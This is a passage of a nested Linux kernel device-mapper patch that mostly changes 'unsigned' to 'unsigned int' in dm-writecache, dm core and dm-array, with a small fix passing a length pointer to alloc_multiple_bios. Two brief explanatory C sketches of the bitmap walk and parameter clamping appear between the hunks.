++	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+ 	struct bvec_iter iter;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 96a003eb73234..431c84595ddb7 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -128,9 +128,9 @@ struct dm_writecache {
+ 	unsigned long max_age;
+ 	unsigned long pause;
+ 
+-	unsigned uncommitted_blocks;
+-	unsigned autocommit_blocks;
+-	unsigned max_writeback_jobs;
++	unsigned int uncommitted_blocks;
++	unsigned int autocommit_blocks;
++	unsigned int max_writeback_jobs;
+ 
+ 	int error;
+ 
+@@ -155,7 +155,7 @@ struct dm_writecache {
+ 	sector_t data_device_sectors;
+ 	void *block_start;
+ 	struct wc_entry *entries;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	unsigned char block_size_bits;
+ 
+ 	bool pmem_mode:1;
+@@ -178,13 +178,13 @@ struct dm_writecache {
+ 	bool metadata_only:1;
+ 	bool pause_set:1;
+ 
+-	unsigned high_wm_percent_value;
+-	unsigned low_wm_percent_value;
+-	unsigned autocommit_time_value;
+-	unsigned max_age_value;
+-	unsigned pause_value;
++	unsigned int high_wm_percent_value;
++	unsigned int low_wm_percent_value;
++	unsigned int autocommit_time_value;
++	unsigned int max_age_value;
++	unsigned int pause_value;
+ 
+-	unsigned writeback_all;
++	unsigned int writeback_all;
+ 	struct workqueue_struct *writeback_wq;
+ 	struct work_struct writeback_work;
+ 	struct work_struct flush_work;
+@@ -202,7 +202,7 @@ struct dm_writecache {
+ 
+ 	struct dm_kcopyd_client *dm_kcopyd;
+ 	unsigned long *dirty_bitmap;
+-	unsigned dirty_bitmap_size;
++	unsigned int dirty_bitmap_size;
+ 
+ 	struct bio_set bio_set;
+ 	mempool_t copy_pool;
+@@ -227,7 +227,7 @@ struct writeback_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry **wc_list;
+-	unsigned wc_list_n;
++	unsigned int wc_list_n;
+ 	struct wc_entry *wc_list_inline[WB_LIST_INLINE];
+ 	struct bio bio;
+ };
+@@ -236,7 +236,7 @@ struct copy_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry *e;
+-	unsigned n_entries;
++	unsigned int n_entries;
+ 	int error;
+ };
+ 
+@@ -369,7 +369,7 @@ static struct page *persistent_memory_page(void *addr)
+ 		return virt_to_page(addr);
+ }
+ 
+-static unsigned persistent_memory_page_offset(void *addr)
++static unsigned int persistent_memory_page_offset(void *addr)
+ {
+ 	return (unsigned long)addr & (PAGE_SIZE - 1);
+ }
+@@ -502,11 +502,11 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		COMPLETION_INITIALIZER_ONSTACK(endio.c),
+ 		ATOMIC_INIT(1),
+ 	};
+-	unsigned bitmap_bits = wc->dirty_bitmap_size * 8;
+-	unsigned i = 0;
++	unsigned int bitmap_bits = wc->dirty_bitmap_size * 8;
++	unsigned int i = 0;
+ 
+ 	while (1) {
+-		unsigned j;
++		unsigned int j;
+ 		i = find_next_bit(wc->dirty_bitmap, bitmap_bits, i);
+ 		if (unlikely(i == bitmap_bits))
+ 			break;
+@@ -1100,7 +1100,7 @@ erase_this:
+ 	wc_unlock(wc);
+ }
+ 
+-static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1133,7 +1133,7 @@ static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *
+ 	return 0;
+ }
+ 
+-static int process_flush_on_suspend_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_on_suspend_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1153,7 +1153,7 @@ static void activate_cleaner(struct dm_writecache *wc)
+ 	wc->freelist_low_watermark = wc->n_blocks;
+ }
+ 
+-static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_cleaner_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1167,7 +1167,7 @@ static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache
+ 	return 0;
+ }
+ 
+-static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_clear_stats_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1179,8 +1179,8 @@ static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writec
+ 	return 0;
+ }
+ 
+-static int writecache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int writecache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_writecache *wc = ti->private;
+@@ -1238,9 +1238,9 @@ static void memcpy_flushcache_optimized(void *dest, void *source, size_t size)
+ static void bio_copy_block(struct dm_writecache *wc, struct bio *bio, void *data)
+ {
+ 	void *buf;
+-	unsigned size;
++	unsigned int size;
+ 	int rw = bio_data_dir(bio);
+-	unsigned remaining_size = wc->block_size;
++	unsigned int remaining_size = wc->block_size;
+ 
+ 	do {
+ 		struct bio_vec bv = bio_iter_iovec(bio, bio->bi_iter);
+@@ -1371,7 +1371,7 @@ read_next_block:
+ static void writecache_bio_copy_ssd(struct dm_writecache *wc, struct bio *bio,
+ 				    struct wc_entry *e, bool search_used)
+ {
+-	unsigned bio_size = wc->block_size;
++	unsigned int bio_size = wc->block_size;
+ 	sector_t start_cache_sec = cache_sector(wc, e);
+ 	sector_t current_cache_sec = start_cache_sec + (bio_size >> SECTOR_SHIFT);
+ 
+@@ -1540,7 +1540,7 @@ static int writecache_map(struct dm_target *ti, struct bio *bio)
+ 
+ 	bio->bi_iter.bi_sector = dm_target_offset(ti, bio->bi_iter.bi_sector);
+ 
+-	if (unlikely((((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (unlikely((((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 				(wc->block_size / 512 - 1)) != 0)) {
+ 		DMERR("I/O is not aligned, sector %llu, size %u, block size %u",
+ 		      (unsigned long long)bio->bi_iter.bi_sector,
+@@ -1666,7 +1666,7 @@ static void writecache_copy_endio(int read_err, unsigned long write_err, void *p
+ 
+ static void __writecache_endio_pmem(struct dm_writecache *wc, struct list_head *list)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct writeback_struct *wb;
+ 	struct wc_entry *e;
+ 	unsigned long n_walked = 0;
+@@ -1782,7 +1782,7 @@ pop_from_list:
+ static bool wc_add_block(struct writeback_struct *wb, struct wc_entry *e)
+ {
+ 	struct dm_writecache *wc = wb->wc;
+-	unsigned block_size = wc->block_size;
++	unsigned int block_size = wc->block_size;
+ 	void *address = memory_data(wc, e);
+ 
+ 	persistent_memory_flush_cache(address, block_size);
+@@ -1817,7 +1817,7 @@ static void __writecache_writeback_pmem(struct dm_writecache *wc, struct writeba
+ 	struct wc_entry *e, *f;
+ 	struct bio *bio;
+ 	struct writeback_struct *wb;
+-	unsigned max_pages;
++	unsigned int max_pages;
+ 
+ 	while (wbl->size) {
+ 		wbl->size--;
+@@ -1880,7 +1880,7 @@ static void __writecache_writeback_ssd(struct dm_writecache *wc, struct writebac
+ 	struct copy_struct *c;
+ 
+ 	while (wbl->size) {
+-		unsigned n_sectors;
++		unsigned int n_sectors;
+ 
+ 		wbl->size--;
+ 		e = container_of(wbl->list.prev, struct wc_entry, lru);
+@@ -2092,7 +2092,7 @@ restart:
+ 	}
+ }
+ 
+-static int calculate_memory_size(uint64_t device_size, unsigned block_size,
++static int calculate_memory_size(uint64_t device_size, unsigned int block_size,
+ 				 size_t *n_blocks_p, size_t *n_metadata_blocks_p)
+ {
+ 	uint64_t n_blocks, offset;
+@@ -2207,12 +2207,12 @@ static void writecache_dtr(struct dm_target *ti)
+ 	kfree(wc);
+ }
+ 
+-static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int writecache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_writecache *wc;
+ 	struct dm_arg_set as;
+ 	const char *string;
+-	unsigned opt_params;
++	unsigned int opt_params;
+ 	size_t offset, data_size;
+ 	int i, r;
+ 	char dummy;
+@@ -2419,7 +2419,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 				goto invalid_optional;
+ 			wc->autocommit_blocks_set = true;
+ 		} else if (!strcasecmp(string, "autocommit_time") && opt_params >= 1) {
+-			unsigned autocommit_msecs;
++			unsigned int autocommit_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &autocommit_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2429,7 +2429,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 			wc->autocommit_time_value = autocommit_msecs;
+ 			wc->autocommit_time_set = true;
+ 		} else if (!strcasecmp(string, "max_age") && opt_params >= 1) {
+-			unsigned max_age_msecs;
++			unsigned int max_age_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &max_age_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2454,7 +2454,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		} else if (!strcasecmp(string, "metadata_only")) {
+ 			wc->metadata_only = true;
+ 		} else if (!strcasecmp(string, "pause_writeback") && opt_params >= 1) {
+-			unsigned pause_msecs;
++			unsigned int pause_msecs;
+ 			if (WC_MODE_PMEM(wc))
+ 				goto invalid_optional;
+ 			string = dm_shift_arg(&as), opt_params--;
+@@ -2653,11 +2653,11 @@ bad:
+ }
+ 
+ static void writecache_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result, unsigned maxlen)
++			      unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_writecache *wc = ti->private;
+-	unsigned extra_args;
+-	unsigned sz = 0;
++	unsigned int extra_args;
++	unsigned int sz = 0;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
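
ssd_commit_flushed() in the hunks above walks the dirty bitmap with find_next_bit() and then extends over the contiguous run of set bits so adjacent dirty metadata blocks go out in one I/O; the run-extension step is elided from the hunk, so treat it as an assumption here. A userspace sketch of that walk:

#include <stdio.h>

int main(void)
{
	unsigned long bitmap = 0x1CCUL;	/* assumed dirty bits 2-3 and 6-8 */
	unsigned int bits = 10, i = 0;

	while (i < bits) {
		unsigned int j;

		while (i < bits && !(bitmap & (1UL << i)))
			i++;			/* find_next_bit() in-kernel */
		if (i == bits)
			break;
		for (j = i; j < bits && (bitmap & (1UL << j)); j++)
			;			/* extend over the run */
		printf("flush blocks [%u, %u)\n", i, j);
		i = j;
	}
	return 0;
}
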
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 38d8aa21ef7ac..24284d22f15bc 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -83,7 +83,7 @@ struct clone_info {
+ 	struct bio *bio;
+ 	struct dm_io *io;
+ 	sector_t sector;
+-	unsigned sector_count;
++	unsigned int sector_count;
+ 	bool is_abnormal_io:1;
+ 	bool submit_as_polled:1;
+ };
+@@ -111,7 +111,7 @@ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size)
+ }
+ EXPORT_SYMBOL_GPL(dm_bio_from_per_bio_data);
+ 
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio)
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio)
+ {
+ 	return container_of(bio, struct dm_target_io, clone)->target_bio_nr;
+ }
+@@ -142,7 +142,7 @@ struct table_device {
+  * Bio-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_BIO_BASED_IOS		16
+-static unsigned reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
++static unsigned int reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
+ 
+ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ {
+@@ -165,11 +165,10 @@ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ 	return param;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param,
+-			       unsigned def, unsigned max)
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max)
+ {
+-	unsigned param = READ_ONCE(*module_param);
+-	unsigned modified_param = 0;
++	unsigned int param = READ_ONCE(*module_param);
++	unsigned int modified_param = 0;
+ 
+ 	if (!param)
+ 		modified_param = def;
+@@ -184,14 +183,14 @@ unsigned __dm_get_module_param(unsigned *module_param,
+ 	return param;
+ }
+ 
+-unsigned dm_get_reserved_bio_based_ios(void)
++unsigned int dm_get_reserved_bio_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_bio_based_ios,
+ 				     RESERVED_BIO_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ EXPORT_SYMBOL_GPL(dm_get_reserved_bio_based_ios);
+ 
+-static unsigned dm_get_numa_node(void)
++static unsigned int dm_get_numa_node(void)
+ {
+ 	return __dm_get_module_param_int(&dm_numa_node,
+ 					 DM_NUMA_NODE, num_online_nodes() - 1);
+@@ -603,7 +602,7 @@ static void free_io(struct dm_io *io)
+ }
+ 
+ static struct bio *alloc_tio(struct clone_info *ci, struct dm_target *ti,
+-			     unsigned target_bio_nr, unsigned *len, gfp_t gfp_mask)
++			     unsigned int target_bio_nr, unsigned int *len, gfp_t gfp_mask)
+ {
+ 	struct mapped_device *md = ci->io->md;
+ 	struct dm_target_io *tio;
+@@ -1327,11 +1326,11 @@ out:
+  * the partially processed part (the sum of regions 1+2) must be the same for all
+  * copies of the bio.
+  */
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors)
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors)
+ {
+ 	struct dm_target_io *tio = clone_to_tio(bio);
+ 	struct dm_io *io = tio->io;
+-	unsigned bio_sectors = bio_sectors(bio);
++	unsigned int bio_sectors = bio_sectors(bio);
+ 
+ 	BUG_ON(dm_tio_flagged(tio, DM_TIO_IS_DUPLICATE_BIO));
+ 	BUG_ON(op_is_zone_mgmt(bio_op(bio)));
+@@ -1460,7 +1459,7 @@ static void __map_bio(struct bio *clone)
+ 	}
+ }
+ 
+-static void setup_split_accounting(struct clone_info *ci, unsigned len)
++static void setup_split_accounting(struct clone_info *ci, unsigned int len)
+ {
+ 	struct dm_io *io = ci->io;
+ 
+@@ -1476,7 +1475,8 @@ static void setup_split_accounting(struct clone_info *ci, unsigned len)
+ }
+ 
+ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+-				struct dm_target *ti, unsigned num_bios)
++				struct dm_target *ti, unsigned int num_bios,
++				unsigned *len)
+ {
+ 	struct bio *bio;
+ 	int try;
+@@ -1487,7 +1487,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ 		if (try)
+ 			mutex_lock(&ci->io->md->table_devices_lock);
+ 		for (bio_nr = 0; bio_nr < num_bios; bio_nr++) {
+-			bio = alloc_tio(ci, ti, bio_nr, NULL,
++			bio = alloc_tio(ci, ti, bio_nr, len,
+ 					try ? GFP_NOIO : GFP_NOWAIT);
+ 			if (!bio)
+ 				break;
+@@ -1505,7 +1505,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ }
+ 
+ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+-				 unsigned int num_bios, unsigned *len)
++				 unsigned int num_bios, unsigned int *len)
+ {
+ 	struct bio_list blist = BIO_EMPTY_LIST;
+ 	struct bio *clone;
+@@ -1525,7 +1525,7 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		if (len)
+ 			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+-		alloc_multiple_bios(&blist, ci, ti, num_bios);
++		alloc_multiple_bios(&blist, ci, ti, num_bios, len);
+ 		while ((clone = bio_list_pop(&blist))) {
+ 			dm_tio_set_flag(clone_to_tio(clone), DM_TIO_IS_DUPLICATE_BIO);
+ 			__map_bio(clone);
+@@ -1573,10 +1573,9 @@ static void __send_empty_flush(struct clone_info *ci)
+ }
+ 
+ static void __send_changing_extent_only(struct clone_info *ci, struct dm_target *ti,
+-					unsigned num_bios)
++					unsigned int num_bios)
+ {
+-	unsigned len;
+-	unsigned int bios;
++	unsigned int len, bios;
+ 
+ 	len = min_t(sector_t, ci->sector_count,
+ 		    max_io_len_target_boundary(ti, dm_target_offset(ti, ci->sector)));
+@@ -1614,7 +1613,7 @@ static bool is_abnormal_io(struct bio *bio)
+ static blk_status_t __process_abnormal_io(struct clone_info *ci,
+ 					  struct dm_target *ti)
+ {
+-	unsigned num_bios = 0;
++	unsigned int num_bios = 0;
+ 
+ 	switch (bio_op(ci->bio)) {
+ 	case REQ_OP_DISCARD:
+@@ -1692,7 +1691,7 @@ static blk_status_t __split_and_process_bio(struct clone_info *ci)
+ {
+ 	struct bio *clone;
+ 	struct dm_target *ti;
+-	unsigned len;
++	unsigned int len;
+ 
+ 	ti = dm_table_find_target(ci->map, ci->sector);
+ 	if (unlikely(!ti))
+@@ -2389,7 +2388,7 @@ out_undo_holders:
+ struct mapped_device *dm_get_md(dev_t dev)
+ {
+ 	struct mapped_device *md;
+-	unsigned minor = MINOR(dev);
++	unsigned int minor = MINOR(dev);
+ 
+ 	if (MAJOR(dev) != _major || minor >= (1 << MINORBITS))
+ 		return NULL;
+@@ -2672,7 +2671,7 @@ static void unlock_fs(struct mapped_device *md)
+  * are being added to md->deferred list.
+  */
+ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+-			unsigned suspend_flags, unsigned int task_state,
++			unsigned int suspend_flags, unsigned int task_state,
+ 			int dmf_suspended_flag)
+ {
+ 	bool do_lockfs = suspend_flags & DM_SUSPEND_LOCKFS_FLAG;
+@@ -2779,7 +2778,7 @@ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+  *
+  * To abort suspend, start the request_queue.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags)
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 	int r = 0;
+@@ -2881,7 +2880,7 @@ out:
+  * It may be used only from the kernel.
+  */
+ 
+-static void __dm_internal_suspend(struct mapped_device *md, unsigned suspend_flags)
++static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 
+@@ -2983,10 +2982,10 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent)
++		      unsigned int cookie, bool need_resize_uevent)
+ {
+ 	int r;
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+ 	char *envp[3] = { NULL, NULL, NULL };
+ 	char **envpp = envp;
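
__dm_get_module_param() above reads a module parameter once and normalizes it: zero falls back to the default, and, in the part elided from the hunk, oversized values are assumed to be capped at the maximum. A plain userspace rendering without the in-kernel cmpxchg write-back:

#include <stdio.h>

static unsigned int get_module_param(unsigned int *module_param,
				     unsigned int def, unsigned int max)
{
	unsigned int param = *module_param;

	if (!param)
		param = def;
	else if (param > max)
		param = max;	/* assumed clamp, elided from the hunk */
	return param;
}

int main(void)
{
	unsigned int p = 0;

	printf("%u\n", get_module_param(&p, 16, 1024));	/* 16 */
	p = 5000;
	printf("%u\n", get_module_param(&p, 16, 1024));	/* 1024 */
	return 0;
}
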
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index a9a3ffcad084c..a7917df09cafb 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent);
++		      unsigned int cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+@@ -222,6 +222,6 @@ void dm_free_md_mempools(struct dm_md_mempools *pools);
+ /*
+  * Various helpers
+  */
+-unsigned dm_get_reserved_bio_based_ios(void);
++unsigned int dm_get_reserved_bio_based_ios(void);
+ 
+ #endif
+diff --git a/drivers/md/persistent-data/dm-array.c b/drivers/md/persistent-data/dm-array.c
+index 3a963d783a865..eff9b41869f29 100644
+--- a/drivers/md/persistent-data/dm-array.c
++++ b/drivers/md/persistent-data/dm-array.c
+@@ -68,8 +68,8 @@ static int array_block_check(struct dm_block_validator *v,
+ 					       CSUM_XOR));
+ 	if (csum_disk != bh_le->csum) {
+ 		DMERR_LIMIT("array_block_check failed: csum %u != wanted %u",
+-			    (unsigned) le32_to_cpu(csum_disk),
+-			    (unsigned) le32_to_cpu(bh_le->csum));
++			    (unsigned int) le32_to_cpu(csum_disk),
++			    (unsigned int) le32_to_cpu(bh_le->csum));
+ 		return -EILSEQ;
+ 	}
+ 
+@@ -94,7 +94,7 @@ static struct dm_block_validator array_validator = {
+  * index - The index into _this_ specific block.
+  */
+ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+-			unsigned index)
++			unsigned int index)
+ {
+ 	unsigned char *entry = (unsigned char *) (ab + 1);
+ 
+@@ -108,9 +108,9 @@ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+  * in an array block.
+  */
+ static void on_entries(struct dm_array_info *info, struct array_block *ab,
+-		       void (*fn)(void *, const void *, unsigned))
++		       void (*fn)(void *, const void *, unsigned int))
+ {
+-	unsigned nr_entries = le32_to_cpu(ab->nr_entries);
++	unsigned int nr_entries = le32_to_cpu(ab->nr_entries);
+ 	fn(info->value_type.context, element_at(info, ab, 0), nr_entries);
+ }
+ 
+@@ -171,7 +171,7 @@ static int alloc_ablock(struct dm_array_info *info, size_t size_of_block,
+  * the current number of entries.
+  */
+ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+-			const void *value, unsigned new_nr)
++			const void *value, unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta, i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -194,7 +194,7 @@ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+  * entries.
+  */
+ static void trim_ablock(struct dm_array_info *info, struct array_block *ab,
+-			unsigned new_nr)
++			unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -247,7 +247,7 @@ static void unlock_ablock(struct dm_array_info *info, struct dm_block *block)
+  * / max_entries).
+  */
+ static int lookup_ablock(struct dm_array_info *info, dm_block_t root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -295,7 +295,7 @@ static int __shadow_ablock(struct dm_array_info *info, dm_block_t b,
+  * The shadow op will often be a noop.  Only insert if it really
+  * copied data.
+  */
+-static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
++static int __reinsert_ablock(struct dm_array_info *info, unsigned int index,
+ 			     struct dm_block *block, dm_block_t b,
+ 			     dm_block_t *root)
+ {
+@@ -321,7 +321,7 @@ static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
+  * for both the current root block, and the new one.
+  */
+ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -346,7 +346,7 @@ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+  */
+ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ 			     uint32_t max_entries,
+-			     unsigned block_index, uint32_t nr,
++			     unsigned int block_index, uint32_t nr,
+ 			     const void *value, dm_block_t *root)
+ {
+ 	int r;
+@@ -365,8 +365,8 @@ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ }
+ 
+ static int insert_full_ablocks(struct dm_array_info *info, size_t size_of_block,
+-			       unsigned begin_block, unsigned end_block,
+-			       unsigned max_entries, const void *value,
++			       unsigned int begin_block, unsigned int end_block,
++			       unsigned int max_entries, const void *value,
+ 			       dm_block_t *root)
+ {
+ 	int r = 0;
+@@ -402,20 +402,20 @@ struct resize {
+ 	/*
+ 	 * Maximum nr entries in an array block.
+ 	 */
+-	unsigned max_entries;
++	unsigned int max_entries;
+ 
+ 	/*
+ 	 * nr of completely full blocks in the array.
+ 	 *
+ 	 * 'old' refers to before the resize, 'new' after.
+ 	 */
+-	unsigned old_nr_full_blocks, new_nr_full_blocks;
++	unsigned int old_nr_full_blocks, new_nr_full_blocks;
+ 
+ 	/*
+ 	 * Number of entries in the final block.  0 iff only full blocks in
+ 	 * the array.
+ 	 */
+-	unsigned old_nr_entries_in_last_block, new_nr_entries_in_last_block;
++	unsigned int old_nr_entries_in_last_block, new_nr_entries_in_last_block;
+ 
+ 	/*
+ 	 * The default value used when growing the array.
+@@ -430,8 +430,8 @@ struct resize {
+  * begin_index - the index of the first array block to remove.
+  * end_index - the one-past-the-end value.  ie. this block is not removed.
+  */
+-static int drop_blocks(struct resize *resize, unsigned begin_index,
+-		       unsigned end_index)
++static int drop_blocks(struct resize *resize, unsigned int begin_index,
++		       unsigned int end_index)
+ {
+ 	int r;
+ 
+@@ -449,8 +449,8 @@ static int drop_blocks(struct resize *resize, unsigned begin_index,
+ /*
+  * Calculates how many blocks are needed for the array.
+  */
+-static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+-				       unsigned nr_entries_in_last_block)
++static unsigned int total_nr_blocks_needed(unsigned int nr_full_blocks,
++				       unsigned int nr_entries_in_last_block)
+ {
+ 	return nr_full_blocks + (nr_entries_in_last_block ? 1 : 0);
+ }
+@@ -461,7 +461,7 @@ static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+ static int shrink(struct resize *resize)
+ {
+ 	int r;
+-	unsigned begin, end;
++	unsigned int begin, end;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+@@ -527,7 +527,7 @@ static int grow_add_tail_block(struct resize *resize)
+ static int grow_needs_more_blocks(struct resize *resize)
+ {
+ 	int r;
+-	unsigned old_nr_blocks = resize->old_nr_full_blocks;
++	unsigned int old_nr_blocks = resize->old_nr_full_blocks;
+ 
+ 	if (resize->old_nr_entries_in_last_block > 0) {
+ 		old_nr_blocks++;
+@@ -569,11 +569,11 @@ static int grow(struct resize *resize)
+  * These are the value_type functions for the btree elements, which point
+  * to array blocks.
+  */
+-static void block_inc(void *context, const void *value, unsigned count)
++static void block_inc(void *context, const void *value, unsigned int count)
+ {
+ 	const __le64 *block_le = value;
+ 	struct dm_array_info *info = context;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, block_le++)
+ 		dm_tm_inc(info->btree_info.tm, le64_to_cpu(*block_le));
+@@ -618,9 +618,9 @@ static void __block_dec(void *context, const void *value)
+ 	dm_tm_dec(info->btree_info.tm, b);
+ }
+ 
+-static void block_dec(void *context, const void *value, unsigned count)
++static void block_dec(void *context, const void *value, unsigned int count)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < count; i++, value += sizeof(__le64))
+ 		__block_dec(context, value);
+ }
+@@ -700,10 +700,11 @@ int dm_array_resize(struct dm_array_info *info, dm_block_t root,
+ EXPORT_SYMBOL_GPL(dm_array_resize);
+ 
+ static int populate_ablock_with_values(struct dm_array_info *info, struct array_block *ab,
+-				       value_fn fn, void *context, unsigned base, unsigned new_nr)
++				       value_fn fn, void *context,
++				       unsigned int base, unsigned int new_nr)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+ 	BUG_ON(le32_to_cpu(ab->nr_entries));
+@@ -728,7 +729,7 @@ int dm_array_new(struct dm_array_info *info, dm_block_t *root,
+ 	int r;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned block_index, end_block, size_of_block, max_entries;
++	unsigned int block_index, end_block, size_of_block, max_entries;
+ 
+ 	r = dm_array_empty(info, root);
+ 	if (r)
+@@ -776,7 +777,7 @@ int dm_array_get_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned entry, max_entries;
++	unsigned int entry, max_entries;
+ 
+ 	size_of_block = dm_bm_block_size(dm_tm_get_bm(info->btree_info.tm));
+ 	max_entries = calc_max_entries(info->value_type.size, size_of_block);
+@@ -804,8 +805,8 @@ static int array_set_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned max_entries;
+-	unsigned entry;
++	unsigned int max_entries;
++	unsigned int entry;
+ 	void *old_value;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+@@ -861,9 +862,9 @@ static int walk_ablock(void *context, uint64_t *keys, void *leaf)
+ 	struct walk_info *wi = context;
+ 
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	__le64 block_le;
+-	unsigned nr_entries, max_entries;
